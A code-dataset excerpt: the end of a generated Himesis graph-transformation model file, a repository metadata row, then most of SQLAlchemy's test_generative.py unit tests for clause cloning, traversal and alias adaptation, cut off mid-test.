self.add_edges([[0, 6], [6, 5], [0, 8], [8, 7], [1, 10], [10, 9], [1, 12], [12, 11], [5, 3], [3, 7], [9, 4], [4, 11], [9, 13], [13, 5], [11, 14], [14, 7], [9, 15], [15, 16], [17, 18], [18, 16], [17, 19], [19, 20], [11, 21], [21, 22], [23, 24], [24, 22], [23, 25], [25, 26], [0, 2], [2, 1]])
# Set the graph attributes
self["mm__"] = ['HimesisMM']
self["name"] = """eattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType"""
self["GUID__"] = 7500290523339363630
# Set the node attributes
self.vs[0]["mm__"] = """MatchModel"""
self.vs[0]["GUID__"] = 3345355481358239434
self.vs[1]["mm__"] = """ApplyModel"""
self.vs[1]["GUID__"] = 2661112097501954342
self.vs[2]["mm__"] = """paired_with"""
self.vs[2]["GUID__"] = 2884002363878182308
self.vs[3]["associationType"] = """eGenericType"""
self.vs[3]["mm__"] = """directLink_S"""
self.vs[3]["GUID__"] = 3237503427209923934
self.vs[4]["associationType"] = """eGenericType"""
self.vs[4]["mm__"] = """directLink_T"""
self.vs[4]["GUID__"] = 3487447824061178971
self.vs[5]["name"] = """"""
self.vs[5]["classtype"] = """EAttribute"""
self.vs[5]["mm__"] = """EAttribute"""
self.vs[5]["cardinality"] = """+"""
self.vs[5]["GUID__"] = 180383522542507929
self.vs[6]["mm__"] = """match_contains"""
self.vs[6]["GUID__"] = 9029141784669719181
self.vs[7]["name"] = """"""
self.vs[7]["classtype"] = """EGenericType"""
self.vs[7]["mm__"] = """EGenericType"""
self.vs[7]["cardinality"] = """+"""
self.vs[7]["GUID__"] = 705924063494009604
self.vs[8]["mm__"] = """match_contains"""
self.vs[8]["GUID__"] = 5107917165971943200
self.vs[9]["name"] = """"""
self.vs[9]["classtype"] = """EAttribute"""
self.vs[9]["mm__"] = """EAttribute"""
self.vs[9]["cardinality"] = """1"""
self.vs[9]["GUID__"] = 8056650007601953622
self.vs[10]["mm__"] = """apply_contains"""
self.vs[10]["GUID__"] = 8334363595364440411
self.vs[11]["name"] = """"""
self.vs[11]["classtype"] = """EGenericType"""
self.vs[11]["mm__"] = """EGenericType"""
self.vs[11]["cardinality"] = """1"""
self.vs[11]["GUID__"] = 638205883689070586
self.vs[12]["mm__"] = """apply_contains"""
self.vs[12]["GUID__"] = 5247899703763388228
self.vs[13]["mm__"] = """backward_link"""
self.vs[13]["type"] = """ruleDef"""
self.vs[13]["GUID__"] = 9152985125860709070
self.vs[14]["mm__"] = """backward_link"""
self.vs[14]["type"] = """ruleDef"""
self.vs[14]["GUID__"] = 8939660675905724386
self.vs[15]["mm__"] = """hasAttribute_T"""
self.vs[15]["GUID__"] = 4724550716111922994
self.vs[16]["name"] = """ApplyAttribute"""
self.vs[16]["Type"] = """'String'"""
self.vs[16]["mm__"] = """Attribute"""
self.vs[16]["GUID__"] = 6342963225845912724
self.vs[17]["name"] = """eq_"""
self.vs[17]["mm__"] = """Equation"""
self.vs[17]["GUID__"] = 8425545405611867446
self.vs[18]["mm__"] = """leftExpr"""
self.vs[18]["GUID__"] = 2510594769584959828
self.vs[19]["mm__"] = """rightExpr"""
self.vs[19]["GUID__"] = 2091737926535973939
self.vs[20]["name"] = """solveRef"""
self.vs[20]["Type"] = """'String'"""
self.vs[20]["mm__"] = """Constant"""
self.vs[20]["GUID__"] = 8569331947771768572
self.vs[21]["mm__"] = """hasAttribute_T"""
self.vs[21]["GUID__"] = 684785101581142767
self.vs[22]["name"] = """ApplyAttribute"""
self.vs[22]["Type"] = """'String'"""
self.vs[22]["mm__"] = """Attribute"""
self.vs[22]["GUID__"] = 9082076936603064885
self.vs[23]["name"] = """eq_"""
self.vs[23]["mm__"] = """Equation"""
self.vs[23]["GUID__"] = 4941466305534700405
self.vs[24]["mm__"] = """leftExpr"""
self.vs[24]["GUID__"] = 2426201971054401358
self.vs[25]["mm__"] = """rightExpr"""
self.vs[25]["GUID__"] = 4495076672642341780
self.vs[26]["name"] = """solveRef"""
self.vs[26]["Type"] = """'String'"""
self.vs[26]["mm__"] = """Constant"""
self.vs[26]["GUID__"] = 7828040183483422309
| mit | 4,146,659,116,746,106,400 | 48.407767 | 298 | 0.523875 | false |
Abi1ity/uniclust2.0 | SQLAlchemy-0.9.9/test/sql/test_generative.py | 1 | 58459 | from sqlalchemy.sql import table, column, ClauseElement, operators
from sqlalchemy.sql.expression import _clone, _from_objects
from sqlalchemy import func, select, Integer, Table, \
Column, MetaData, extract, String, bindparam, tuple_, and_, union, text,\
case, ForeignKey, literal_column
from sqlalchemy.testing import fixtures, AssertsExecutionResults, \
AssertsCompiledSQL
from sqlalchemy import testing
from sqlalchemy.sql.visitors import ClauseVisitor, CloningVisitor, \
cloned_traverse, ReplacingCloningVisitor
from sqlalchemy import exc
from sqlalchemy.sql import util as sql_util
from sqlalchemy.testing import eq_, is_, assert_raises, assert_raises_message
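# module-level placeholders, populated by the individual test classes'
# setup_class() methods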
A = B = t1 = t2 = t3 = table1 = table2 = table3 = table4 = None
class TraversalTest(fixtures.TestBase, AssertsExecutionResults):
"""test ClauseVisitor's traversal, particularly its
ability to copy and modify a ClauseElement in place."""
@classmethod
def setup_class(cls):
global A, B
# establish two fictitious ClauseElements.
# define deep equality semantics as well as deep
# identity semantics.
class A(ClauseElement):
__visit_name__ = 'a'
def __init__(self, expr):
self.expr = expr
def is_other(self, other):
return other is self
__hash__ = ClauseElement.__hash__
def __eq__(self, other):
return other.expr == self.expr
def __ne__(self, other):
return other.expr != self.expr
def __str__(self):
return "A(%s)" % repr(self.expr)
class B(ClauseElement):
__visit_name__ = 'b'
def __init__(self, *items):
self.items = items
def is_other(self, other):
if other is not self:
return False
for i1, i2 in zip(self.items, other.items):
if i1 is not i2:
return False
return True
__hash__ = ClauseElement.__hash__
def __eq__(self, other):
for i1, i2 in zip(self.items, other.items):
if i1 != i2:
return False
return True
def __ne__(self, other):
for i1, i2 in zip(self.items, other.items):
if i1 != i2:
return True
return False
def _copy_internals(self, clone=_clone):
self.items = [clone(i) for i in self.items]
def get_children(self, **kwargs):
return self.items
def __str__(self):
return "B(%s)" % repr([str(i) for i in self.items])
def test_test_classes(self):
a1 = A("expr1")
struct = B(a1, A("expr2"), B(A("expr1b"), A("expr2b")), A("expr3"))
struct2 = B(a1, A("expr2"), B(A("expr1b"), A("expr2b")), A("expr3"))
struct3 = B(a1, A("expr2"), B(A("expr1b"),
A("expr2bmodified")), A("expr3"))
assert a1.is_other(a1)
assert struct.is_other(struct)
assert struct == struct2
assert struct != struct3
assert not struct.is_other(struct2)
assert not struct.is_other(struct3)
def test_clone(self):
struct = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2b")), A("expr3"))
class Vis(CloningVisitor):
def visit_a(self, a):
pass
def visit_b(self, b):
pass
vis = Vis()
s2 = vis.traverse(struct)
assert struct == s2
assert not struct.is_other(s2)
def test_no_clone(self):
struct = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2b")), A("expr3"))
class Vis(ClauseVisitor):
def visit_a(self, a):
pass
def visit_b(self, b):
pass
vis = Vis()
s2 = vis.traverse(struct)
assert struct == s2
assert struct.is_other(s2)
def test_clone_anon_label(self):
from sqlalchemy.sql.elements import Grouping
c1 = Grouping(literal_column('q'))
s1 = select([c1])
class Vis(CloningVisitor):
def visit_grouping(self, elem):
pass
vis = Vis()
s2 = vis.traverse(s1)
eq_(list(s2.inner_columns)[0].anon_label, c1.anon_label)
def test_change_in_place(self):
struct = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2b")), A("expr3"))
struct2 = B(A("expr1"), A("expr2modified"), B(A("expr1b"),
A("expr2b")), A("expr3"))
struct3 = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2bmodified")), A("expr3"))
class Vis(CloningVisitor):
def visit_a(self, a):
if a.expr == "expr2":
a.expr = "expr2modified"
def visit_b(self, b):
pass
vis = Vis()
s2 = vis.traverse(struct)
assert struct != s2
assert not struct.is_other(s2)
assert struct2 == s2
class Vis2(CloningVisitor):
def visit_a(self, a):
if a.expr == "expr2b":
a.expr = "expr2bmodified"
def visit_b(self, b):
pass
vis2 = Vis2()
s3 = vis2.traverse(struct)
assert struct != s3
assert struct3 == s3
def test_visit_name(self):
# override fns in testlib/schema.py
from sqlalchemy import Column
class CustomObj(Column):
pass
assert CustomObj.__visit_name__ == Column.__visit_name__ == 'column'
foo, bar = CustomObj('foo', String), CustomObj('bar', String)
bin = foo == bar
set(ClauseVisitor().iterate(bin))
assert set(ClauseVisitor().iterate(bin)) == set([foo, bar, bin])
class BinaryEndpointTraversalTest(fixtures.TestBase):
"""test the special binary product visit"""
def _assert_traversal(self, expr, expected):
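        # visit_binary_product() calls ``visit`` once per left/right endpoint
        # pair of the binary expressions in ``expr``, expanding tuples and
        # conjunctions; record the calls and compare to the expected sequence.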
canary = []
def visit(binary, l, r):
canary.append((binary.operator, l, r))
print(binary.operator, l, r)
sql_util.visit_binary_product(visit, expr)
eq_(
canary, expected
)
def test_basic(self):
a, b = column("a"), column("b")
self._assert_traversal(
a == b,
[
(operators.eq, a, b)
]
)
def test_with_tuples(self):
a, b, c, d, b1, b1a, b1b, e, f = (
column("a"),
column("b"),
column("c"),
column("d"),
column("b1"),
column("b1a"),
column("b1b"),
column("e"),
column("f")
)
expr = tuple_(
a, b, b1 == tuple_(b1a, b1b == d), c
) > tuple_(
func.go(e + f)
)
self._assert_traversal(
expr,
[
(operators.gt, a, e),
(operators.gt, a, f),
(operators.gt, b, e),
(operators.gt, b, f),
(operators.eq, b1, b1a),
(operators.eq, b1b, d),
(operators.gt, c, e),
(operators.gt, c, f)
]
)
def test_composed(self):
a, b, e, f, q, j, r = (
column("a"),
column("b"),
column("e"),
column("f"),
column("q"),
column("j"),
column("r"),
)
expr = and_(
(a + b) == q + func.sum(e + f),
and_(
j == r,
f == q
)
)
self._assert_traversal(
expr,
[
(operators.eq, a, q),
(operators.eq, a, e),
(operators.eq, a, f),
(operators.eq, b, q),
(operators.eq, b, e),
(operators.eq, b, f),
(operators.eq, j, r),
(operators.eq, f, q),
]
)
def test_subquery(self):
a, b, c = column("a"), column("b"), column("c")
subq = select([c]).where(c == a).as_scalar()
expr = and_(a == b, b == subq)
self._assert_traversal(
expr,
[
(operators.eq, a, b),
(operators.eq, b, subq),
]
)
class ClauseTest(fixtures.TestBase, AssertsCompiledSQL):
"""test copy-in-place behavior of various ClauseElements."""
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global t1, t2, t3
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
t3 = Table('table3', MetaData(),
Column('col1', Integer),
Column('col2', Integer)
)
def test_binary(self):
clause = t1.c.col2 == t2.c.col2
eq_(str(clause), str(CloningVisitor().traverse(clause)))
def test_binary_anon_label_quirk(self):
t = table('t1', column('col1'))
f = t.c.col1 * 5
self.assert_compile(select([f]),
"SELECT t1.col1 * :col1_1 AS anon_1 FROM t1")
f.anon_label
a = t.alias()
f = sql_util.ClauseAdapter(a).traverse(f)
self.assert_compile(
select(
[f]),
"SELECT t1_1.col1 * :col1_1 AS anon_1 FROM t1 AS t1_1")
def test_join(self):
clause = t1.join(t2, t1.c.col2 == t2.c.col2)
c1 = str(clause)
assert str(clause) == str(CloningVisitor().traverse(clause))
class Vis(CloningVisitor):
def visit_binary(self, binary):
binary.right = t2.c.col3
clause2 = Vis().traverse(clause)
assert c1 == str(clause)
assert str(clause2) == str(t1.join(t2, t1.c.col2 == t2.c.col3))
def test_aliased_column_adapt(self):
clause = t1.select()
aliased = t1.select().alias()
aliased2 = t1.alias()
adapter = sql_util.ColumnAdapter(aliased)
f = select([
adapter.columns[c]
for c in aliased2.c
]).select_from(aliased)
s = select([aliased2]).select_from(aliased)
eq_(str(s), str(f))
f = select([
adapter.columns[func.count(aliased2.c.col1)]
]).select_from(aliased)
eq_(
str(select([func.count(aliased2.c.col1)]).select_from(aliased)),
str(f)
)
def test_aliased_cloned_column_adapt_inner(self):
clause = select([t1.c.col1, func.foo(t1.c.col2).label('foo')])
aliased1 = select([clause.c.col1, clause.c.foo])
aliased2 = clause
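        # touch the exported .c collection so the proxy columns exist before
        # the clone below; the bare attribute access is intentional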
aliased2.c.col1, aliased2.c.foo
aliased3 = cloned_traverse(aliased2, {}, {})
# fixed by [ticket:2419]. the inside columns
# on aliased3 have _is_clone_of pointers to those of
# aliased2. corresponding_column checks these
# now.
adapter = sql_util.ColumnAdapter(aliased1)
f1 = select([
adapter.columns[c]
for c in aliased2._raw_columns
])
f2 = select([
adapter.columns[c]
for c in aliased3._raw_columns
])
eq_(
str(f1), str(f2)
)
def test_aliased_cloned_column_adapt_exported(self):
clause = select([t1.c.col1, func.foo(t1.c.col2).label('foo')])
aliased1 = select([clause.c.col1, clause.c.foo])
aliased2 = clause
aliased2.c.col1, aliased2.c.foo
aliased3 = cloned_traverse(aliased2, {}, {})
# also fixed by [ticket:2419]. When we look at the
# *outside* columns of aliased3, they previously did not
# have an _is_clone_of pointer. But we now modified _make_proxy
# to assign this.
adapter = sql_util.ColumnAdapter(aliased1)
f1 = select([
adapter.columns[c]
for c in aliased2.c
])
f2 = select([
adapter.columns[c]
for c in aliased3.c
])
eq_(
str(f1), str(f2)
)
def test_aliased_cloned_schema_column_adapt_exported(self):
clause = select([t3.c.col1, func.foo(t3.c.col2).label('foo')])
aliased1 = select([clause.c.col1, clause.c.foo])
aliased2 = clause
aliased2.c.col1, aliased2.c.foo
aliased3 = cloned_traverse(aliased2, {}, {})
# also fixed by [ticket:2419]. When we look at the
# *outside* columns of aliased3, they previously did not
# have an _is_clone_of pointer. But we now modified _make_proxy
# to assign this.
adapter = sql_util.ColumnAdapter(aliased1)
f1 = select([
adapter.columns[c]
for c in aliased2.c
])
f2 = select([
adapter.columns[c]
for c in aliased3.c
])
eq_(
str(f1), str(f2)
)
def test_text(self):
clause = text(
"select * from table where foo=:bar",
bindparams=[bindparam('bar')])
c1 = str(clause)
class Vis(CloningVisitor):
def visit_textclause(self, text):
text.text = text.text + " SOME MODIFIER=:lala"
text._bindparams['lala'] = bindparam('lala')
clause2 = Vis().traverse(clause)
assert c1 == str(clause)
assert str(clause2) == c1 + " SOME MODIFIER=:lala"
assert list(clause._bindparams.keys()) == ['bar']
assert set(clause2._bindparams.keys()) == set(['bar', 'lala'])
def test_select(self):
s2 = select([t1])
s2_assert = str(s2)
s3_assert = str(select([t1], t1.c.col2 == 7))
class Vis(CloningVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col2 == 7)
s3 = Vis().traverse(s2)
assert str(s3) == s3_assert
assert str(s2) == s2_assert
print(str(s2))
print(str(s3))
class Vis(ClauseVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col2 == 7)
Vis().traverse(s2)
assert str(s2) == s3_assert
s4_assert = str(select([t1], and_(t1.c.col2 == 7, t1.c.col3 == 9)))
class Vis(CloningVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col3 == 9)
s4 = Vis().traverse(s3)
print(str(s3))
print(str(s4))
assert str(s4) == s4_assert
assert str(s3) == s3_assert
s5_assert = str(select([t1], and_(t1.c.col2 == 7, t1.c.col1 == 9)))
class Vis(CloningVisitor):
def visit_binary(self, binary):
if binary.left is t1.c.col3:
binary.left = t1.c.col1
binary.right = bindparam("col1", unique=True)
s5 = Vis().traverse(s4)
print(str(s4))
print(str(s5))
assert str(s5) == s5_assert
assert str(s4) == s4_assert
def test_union(self):
u = union(t1.select(), t2.select())
u2 = CloningVisitor().traverse(u)
assert str(u) == str(u2)
assert [str(c) for c in u2.c] == [str(c) for c in u.c]
u = union(t1.select(), t2.select())
cols = [str(c) for c in u.c]
u2 = CloningVisitor().traverse(u)
assert str(u) == str(u2)
assert [str(c) for c in u2.c] == cols
s1 = select([t1], t1.c.col1 == bindparam('id_param'))
s2 = select([t2])
u = union(s1, s2)
u2 = u.params(id_param=7)
u3 = u.params(id_param=10)
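        # params() returns clones: the rendered SQL is identical but each
        # clone compiles with its own bound value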
assert str(u) == str(u2) == str(u3)
assert u2.compile().params == {'id_param': 7}
assert u3.compile().params == {'id_param': 10}
def test_in(self):
expr = t1.c.col1.in_(['foo', 'bar'])
expr2 = CloningVisitor().traverse(expr)
assert str(expr) == str(expr2)
def test_over(self):
expr = func.row_number().over(order_by=t1.c.col1)
expr2 = CloningVisitor().traverse(expr)
assert str(expr) == str(expr2)
def test_adapt_union(self):
u = union(
t1.select().where(t1.c.col1 == 4),
t1.select().where(t1.c.col1 == 5)
).alias()
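        # the aliased union is derived from t1, so adapting t1 against it
        # swaps in the union alias wholesale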
assert sql_util.ClauseAdapter(u).traverse(t1) is u
def test_binds(self):
"""test that unique bindparams change their name upon clone()
to prevent conflicts"""
s = select([t1], t1.c.col1 == bindparam(None, unique=True)).alias()
s2 = CloningVisitor().traverse(s).alias()
s3 = select([s], s.c.col2 == s2.c.col2)
self.assert_compile(
s3, "SELECT anon_1.col1, anon_1.col2, anon_1.col3 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 WHERE table1.col1 = :param_1) "
"AS anon_1, "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, table1.col3 "
"AS col3 FROM table1 WHERE table1.col1 = :param_2) AS anon_2 "
"WHERE anon_1.col2 = anon_2.col2")
s = select([t1], t1.c.col1 == 4).alias()
s2 = CloningVisitor().traverse(s).alias()
s3 = select([s], s.c.col2 == s2.c.col2)
self.assert_compile(
s3, "SELECT anon_1.col1, anon_1.col2, anon_1.col3 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 WHERE table1.col1 = :col1_1) "
"AS anon_1, "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, table1.col3 "
"AS col3 FROM table1 WHERE table1.col1 = :col1_2) AS anon_2 "
"WHERE anon_1.col2 = anon_2.col2")
def test_extract(self):
s = select([extract('foo', t1.c.col1).label('col1')])
self.assert_compile(
s,
"SELECT EXTRACT(foo FROM table1.col1) AS col1 FROM table1")
s2 = CloningVisitor().traverse(s).alias()
s3 = select([s2.c.col1])
self.assert_compile(
s,
"SELECT EXTRACT(foo FROM table1.col1) AS col1 FROM table1")
self.assert_compile(s3,
"SELECT anon_1.col1 FROM (SELECT EXTRACT(foo FROM "
"table1.col1) AS col1 FROM table1) AS anon_1")
@testing.emits_warning('.*replaced by another column with the same key')
def test_alias(self):
subq = t2.select().alias('subq')
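        # t1.c.col1 and subq.c.col1 share the key 'col1', which triggers the
        # "replaced by another column with the same key" warning tolerated by
        # the decorator above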
s = select([t1.c.col1, subq.c.col1],
from_obj=[t1, subq,
t1.join(subq, t1.c.col1 == subq.c.col2)]
)
orig = str(s)
s2 = CloningVisitor().traverse(s)
assert orig == str(s) == str(s2)
s4 = CloningVisitor().traverse(s2)
assert orig == str(s) == str(s2) == str(s4)
s3 = sql_util.ClauseAdapter(table('foo')).traverse(s)
assert orig == str(s) == str(s3)
s4 = sql_util.ClauseAdapter(table('foo')).traverse(s3)
assert orig == str(s) == str(s3) == str(s4)
subq = subq.alias('subq')
s = select([t1.c.col1, subq.c.col1],
from_obj=[t1, subq,
t1.join(subq, t1.c.col1 == subq.c.col2)]
)
s5 = CloningVisitor().traverse(s)
assert orig == str(s) == str(s5)
def test_correlated_select(self):
s = select(['*'], t1.c.col1 == t2.c.col1,
from_obj=[t1, t2]).correlate(t2)
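        # appending a new criterion during a cloning traversal should leave
        # the explicit correlation to table2 intact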
class Vis(CloningVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col2 == 7)
self.assert_compile(
select([t2]).where(t2.c.col1 == Vis().traverse(s)),
"SELECT table2.col1, table2.col2, table2.col3 "
"FROM table2 WHERE table2.col1 = "
"(SELECT * FROM table1 WHERE table1.col1 = table2.col1 "
"AND table1.col2 = :col2_1)"
)
def test_this_thing(self):
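        # adapting against a table1 alias should reach inside the anonymous
        # subquery, rewriting its inner table1 reference to the alias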
s = select([t1]).where(t1.c.col1 == 'foo').alias()
s2 = select([s.c.col1])
self.assert_compile(s2,
'SELECT anon_1.col1 FROM (SELECT '
'table1.col1 AS col1, table1.col2 AS col2, '
'table1.col3 AS col3 FROM table1 WHERE '
'table1.col1 = :col1_1) AS anon_1')
t1a = t1.alias()
s2 = sql_util.ClauseAdapter(t1a).traverse(s2)
self.assert_compile(s2,
'SELECT anon_1.col1 FROM (SELECT '
'table1_1.col1 AS col1, table1_1.col2 AS '
'col2, table1_1.col3 AS col3 FROM table1 '
'AS table1_1 WHERE table1_1.col1 = '
':col1_1) AS anon_1')
def test_select_fromtwice_one(self):
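        # correlate(t1a) limits correlation to the alias; the enclosing query
        # selects FROM table1 only, so nothing correlates and both table1 and
        # table1_1 must render, before and after cloning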
t1a = t1.alias()
s = select([1], t1.c.col1 == t1a.c.col1, from_obj=t1a).correlate(t1a)
s = select([t1]).where(t1.c.col1 == s)
self.assert_compile(
s, "SELECT table1.col1, table1.col2, table1.col3 FROM table1 "
"WHERE table1.col1 = "
"(SELECT 1 FROM table1, table1 AS table1_1 "
"WHERE table1.col1 = table1_1.col1)")
s = CloningVisitor().traverse(s)
self.assert_compile(
s, "SELECT table1.col1, table1.col2, table1.col3 FROM table1 "
"WHERE table1.col1 = "
"(SELECT 1 FROM table1, table1 AS table1_1 "
"WHERE table1.col1 = table1_1.col1)")
def test_select_fromtwice_two(self):
s = select([t1]).where(t1.c.col1 == 'foo').alias()
s2 = select([1], t1.c.col1 == s.c.col1, from_obj=s).correlate(t1)
s3 = select([t1]).where(t1.c.col1 == s2)
self.assert_compile(
s3, "SELECT table1.col1, table1.col2, table1.col3 "
"FROM table1 WHERE table1.col1 = "
"(SELECT 1 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 "
"WHERE table1.col1 = :col1_1) "
"AS anon_1 WHERE table1.col1 = anon_1.col1)")
s4 = ReplacingCloningVisitor().traverse(s3)
self.assert_compile(
s4, "SELECT table1.col1, table1.col2, table1.col3 "
"FROM table1 WHERE table1.col1 = "
"(SELECT 1 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 "
"WHERE table1.col1 = :col1_1) "
"AS anon_1 WHERE table1.col1 = anon_1.col1)")
class ClauseAdapterTest(fixtures.TestBase, AssertsCompiledSQL):
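    """test sql_util.ClauseAdapter's rewriting of expressions in terms of
    aliases and other adapted selectables."""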
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global t1, t2
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
def test_correlation_on_clone(self):
t1alias = t1.alias('t1alias')
t2alias = t2.alias('t2alias')
vis = sql_util.ClauseAdapter(t1alias)
s = select(['*'], from_obj=[t1alias, t2alias]).as_scalar()
assert t2alias in s._froms
assert t1alias in s._froms
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = vis.traverse(s)
        # not present because it's been cloned
        assert t2alias not in s._froms
        # present because the adapter placed it there
        assert t1alias in s._froms
# correlate list on "s" needs to take into account the full
# _cloned_set for each element in _froms when correlating
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = select(['*'], from_obj=[t1alias,
t2alias]).correlate(t2alias).as_scalar()
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = vis.traverse(s)
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = CloningVisitor().traverse(s)
self.assert_compile(select(['*'], t2alias.c.col1 == s),
'SELECT * FROM table2 AS t2alias WHERE '
't2alias.col1 = (SELECT * FROM table1 AS '
't1alias)')
s = select(['*']).where(t1.c.col1 == t2.c.col1).as_scalar()
self.assert_compile(select([t1.c.col1, s]),
'SELECT table1.col1, (SELECT * FROM table2 '
'WHERE table1.col1 = table2.col1) AS '
'anon_1 FROM table1')
vis = sql_util.ClauseAdapter(t1alias)
s = vis.traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
s = CloningVisitor().traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
s = select(['*']).where(t1.c.col1
== t2.c.col1).correlate(t1).as_scalar()
self.assert_compile(select([t1.c.col1, s]),
'SELECT table1.col1, (SELECT * FROM table2 '
'WHERE table1.col1 = table2.col1) AS '
'anon_1 FROM table1')
vis = sql_util.ClauseAdapter(t1alias)
s = vis.traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
s = CloningVisitor().traverse(s)
self.assert_compile(select([t1alias.c.col1, s]),
'SELECT t1alias.col1, (SELECT * FROM '
'table2 WHERE t1alias.col1 = table2.col1) '
'AS anon_1 FROM table1 AS t1alias')
@testing.fails_on_everything_except()
def test_joins_dont_adapt(self):
# adapting to a join, i.e. ClauseAdapter(t1.join(t2)), doesn't
# make much sense. ClauseAdapter doesn't make any changes if
# it's against a straight join.
users = table('users', column('id'))
addresses = table('addresses', column('id'), column('user_id'))
ualias = users.alias()
s = select([func.count(addresses.c.id)], users.c.id
== addresses.c.user_id).correlate(users)
s = sql_util.ClauseAdapter(ualias).traverse(s)
j1 = addresses.join(ualias, addresses.c.user_id == ualias.c.id)
self.assert_compile(sql_util.ClauseAdapter(j1).traverse(s),
'SELECT count(addresses.id) AS count_1 '
'FROM addresses WHERE users_1.id = '
'addresses.user_id')
def test_table_to_alias_1(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
ff = vis.traverse(func.count(t1.c.col1).label('foo'))
assert list(_from_objects(ff)) == [t1alias]
def test_table_to_alias_2(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(vis.traverse(select(['*'], from_obj=[t1])),
'SELECT * FROM table1 AS t1alias')
def test_table_to_alias_3(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(select(['*'], t1.c.col1 == t2.c.col2),
'SELECT * FROM table1, table2 WHERE '
'table1.col1 = table2.col2')
def test_table_to_alias_4(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(vis.traverse(select(['*'], t1.c.col1
== t2.c.col2)),
'SELECT * FROM table1 AS t1alias, table2 '
'WHERE t1alias.col1 = table2.col2')
def test_table_to_alias_5(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
vis.traverse(
select(
['*'],
t1.c.col1 == t2.c.col2,
from_obj=[
t1,
t2])),
'SELECT * FROM table1 AS t1alias, table2 '
'WHERE t1alias.col1 = table2.col2')
def test_table_to_alias_6(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
select([t1alias, t2]).where(
t1alias.c.col1 == vis.traverse(
select(['*'], t1.c.col1 == t2.c.col2, from_obj=[t1, t2]).
correlate(t1)
)
),
"SELECT t1alias.col1, t1alias.col2, t1alias.col3, "
"table2.col1, table2.col2, table2.col3 "
"FROM table1 AS t1alias, table2 WHERE t1alias.col1 = "
"(SELECT * FROM table2 WHERE t1alias.col1 = table2.col2)"
)
def test_table_to_alias_7(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
select([t1alias, t2]).
where(t1alias.c.col1 == vis.traverse(
select(['*'], t1.c.col1 == t2.c.col2, from_obj=[t1, t2]).
correlate(t2))),
"SELECT t1alias.col1, t1alias.col2, t1alias.col3, "
"table2.col1, table2.col2, table2.col3 "
"FROM table1 AS t1alias, table2 "
"WHERE t1alias.col1 = "
"(SELECT * FROM table1 AS t1alias "
"WHERE t1alias.col1 = table2.col2)")
def test_table_to_alias_8(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
vis.traverse(case([(t1.c.col1 == 5, t1.c.col2)], else_=t1.c.col1)),
'CASE WHEN (t1alias.col1 = :col1_1) THEN '
't1alias.col2 ELSE t1alias.col1 END')
def test_table_to_alias_9(self):
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(
vis.traverse(
case(
[
(5,
t1.c.col2)],
value=t1.c.col1,
else_=t1.c.col1)),
'CASE t1alias.col1 WHEN :param_1 THEN '
't1alias.col2 ELSE t1alias.col1 END')
def test_table_to_alias_10(self):
s = select(['*'], from_obj=[t1]).alias('foo')
self.assert_compile(s.select(),
'SELECT foo.* FROM (SELECT * FROM table1) '
'AS foo')
def test_table_to_alias_11(self):
s = select(['*'], from_obj=[t1]).alias('foo')
t1alias = t1.alias('t1alias')
vis = sql_util.ClauseAdapter(t1alias)
self.assert_compile(vis.traverse(s.select()),
'SELECT foo.* FROM (SELECT * FROM table1 '
'AS t1alias) AS foo')
def test_table_to_alias_12(self):
s = select(['*'], from_obj=[t1]).alias('foo')
